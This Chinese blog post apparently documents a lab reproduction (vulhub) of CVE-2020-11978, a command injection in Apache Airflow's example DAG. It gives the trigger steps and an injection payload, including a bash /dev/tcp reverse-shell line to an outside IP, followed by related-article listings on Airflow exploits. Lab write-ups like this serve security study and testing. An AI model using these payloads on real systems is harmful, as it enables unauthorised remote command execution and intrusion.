Apache Airflow 示例dag中的命令注入(CVE-2020-11978)

最新推荐文章于 2024-05-22 15:57:48 发布
最新推荐文章于 2024-05-22 15:57:48 发布
阅读量884 收藏
点赞数
分类专栏: 漏洞复现笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45957998/article/details/127363207
版权

网络安全

Apache Airflow 示例dag中的命令注入(CVE-2020-11978)

https://github.com/vulhub/vulhub/blob/master/airflow/CVE-2020-11978/README.zh-cn.md

影响范围:Apache Airflow <= 1.10.10

访问http://your-ip:8080进入airflow管理端,将example_trigger_target_dag前面的Off改为On:

image-20220818134229259

再点击执行按钮,在Configuration JSON中输入:{"message":"'\";touch /tmp/airflow_dag_success;#"},再点Trigger执行dag:即可攻击成功

getshell-exp
{"message":"'\";bash -i >& /dev/tcp/172.19.1.34/7777 0>&1;#"}
小白奋斗ing(小破站)
关注
专栏目录
[ vulhub漏洞复现篇 ] Airflow dag命令注入漏洞复现 CVE-2020-11978
qq_51577576的博客
12-20 842
[ vulhub漏洞复现篇 ] Airflow dag命令注入漏洞复现 CVE-2020-11978 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker执行任意命令
Apache Airflow 示例dag命令注入(CVE-2020-11978)
weixin_44047654的博客
11-29 797
Apache Airflow 示例dag命令注入(CVE-2020-11978)
CVE-2020-11978 Apache Airflow 示例dag命令注入漏洞复现
ierciyuan的博客
08-01 680
CVE-2020-11978 Apache Airflow 示例dag命令注入漏洞复现。测试漏洞并反弹shell。
Apache Airflow 命令注入CVE-2020-11978)漏洞复现
weixin_56537388的博客
11-08 169
Apache Airflow 是一个开源的分布式任务调度框架。在 1.10.10 之前的版本示例 DAG 存在一个命令注入漏洞,该漏洞导致攻击者在工作进程执行任意命令
Airflow dag命令注入漏洞(CVE-2020-11978)
m0_49025459的博客
10-31 190
进入CVE-2020-11978目录下,依次使用接下来的命令启动靶场访问漏洞地址:http://ip:8080 即可。
Apache Airflow Celery 消息间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
airflow CVE-2020-11978 漏洞分析
示例和笔记
06-08 546
CVE-2020-11978漏洞的一个示例是发现在Apache Airflow示例dag文件存在命令注入漏洞。攻击者可以通过该漏洞在Airflow服务器上执行恶意命令。具体来说,该漏洞源于示例dag文件的一个BashOperator任务,它执行了一个echo命令并将输出写入文件。该任务通过 {{ ds }} 参数接收当前日期作为参数,并在命令行上执行。然而,该任务并没有对 ds 参数进行严格的验证和过滤,因此攻击者可以通过注入恶意命令来执行任意命令
Apache Airflow Celery 消息间件命令执行漏洞复现(CVE-2020-11981)
Tauil的博客
08-14 1799
利用Airflow的CeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflow的celery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
Apache Airflow 错误的会话验证漏洞 (CVE-2020-17526)利用
weixin_40418457的博客
06-22 1059
0x01 漏洞描述 Apache 官方在2020年12月21日发布的邮件披露Apache Airflow 存在一个由于错误处理会话验证导致的未授权访问漏洞。如果用户使用了默认的秘钥配置,攻击者就可以在其他的一个配置了默认秘钥的站点进行登录,接着以登录后的session信息直接未授权访问受害者站点。 引用:https://mp.weixin.qq.com/s/EN4bsZl1ylpAtpIlISK3nQ 0x02 漏洞利用 FOFA指纹: title=="Airflow - Login&q
漏洞复现----48、Airflow dag命令注入(CVE-2020-11978)
七天
07-04 1581
Airflow dag命令注入(CVE-2020-11978)
CVE-2020-11978 Apache Airflow 命令注入漏洞分析与利用
CuiXY's Blog
09-29 1157
漏洞软件:Apache Airflow影响版本:
CVE-2020-11978Airflow dag命令注入漏洞复现【vulhub靶场】
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-18 3354
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker执行任意命令。基于vulhub靶场的CVE-2020-11978漏洞复现,airflow dag命令注入RCE和反弹shell教学。漏洞复现。......
airflow/CVE-2020-11978复现学习
shierbai的博客
05-21 404
命令注入漏洞哇真有点卡。
Vulhub Apache Airflow 示例dag命令注入CVE-2020-11978)复现 +(shell反弹)
m0_69994768的博客
02-04 412
Vulhub Apache Airflow 示例dag命令注入CVE-2020-11978)复现 +(shell反弹)
Vulhub——Airflow
最新发布
qq_55202378的博客
05-22 506
Apache Airflow是一款开源的,分布式任务调度框架。,如果攻击者控制了Celery的消息间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程执行任意命令。成功绕过登录检测,但是此时cookie值发生了改变,就是不是我们生成的那个cookie了。存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker执行任意命令。,即使开启了认证,攻击者也可以通过一个默认密钥来绕过登录,伪造任意用户。来执行任意命令,参数为命令执行所需要的数组。这个小脚本来执行命令
CVE-2020-11998 —— Apache ActiveMQ 远程代码执行漏洞
战神/calmness的博客
12-10 1261
目录 Apache ActiveMQ 组件介绍 描述 影响版本 过程 修复建议 CVE-2020-11998 | Apache ActiveMQ 远程代码执行漏洞 Apache ActiveMQ 组件介绍 Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 描述 9月10日Apache软件基金会发布安全公告,修复了Apache Active.
CVE-2019-19781简单利用
Lorezon的博客
04-19 1264
声明:只是简单搜索,并不进行攻击,请不要进行违规操作!!! git clone https://github.com/projectzeroindia/CVE-2019-19781 利用FOFA搜索的 title=“Citrix” 的关键信息。 bash CVE-2019-19781.sh ip 'ls' 修复建议: https://support.citrix.com/article/CT...
CVE-2020-7471漏洞复现
qq_39682037的博客
03-29 2631
简介 2020年2月3日,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 漏洞影响 受影响版本: Django 1.11.x < 1.11.2...
Speculoos后门分析:利用CVE-2019-19781漏洞进行传播
systemino的博客
04-18 609
背景 3月25日,FireEye发布了一篇关于APT41组织近期攻击活动的文章。该攻击活动日期为1月20日——3月11日,主要利用近期公布的安全漏洞利用来攻击Citrix、Cisco、Zoho等网络应用。根据WildFire和AutoFocus数据,研究人员获得了攻击Citrix的payload样本,是运行在FreeBSD上编译的可执行文件。研究人员使用该数据发现了受害者遍布全球,位于医疗、高等...
CVE-2020-11978
08-10
回答:CVE-2020-11978Apache Airflow的一个命令注入漏洞。根据引用提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小白奋斗ing(小破站)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值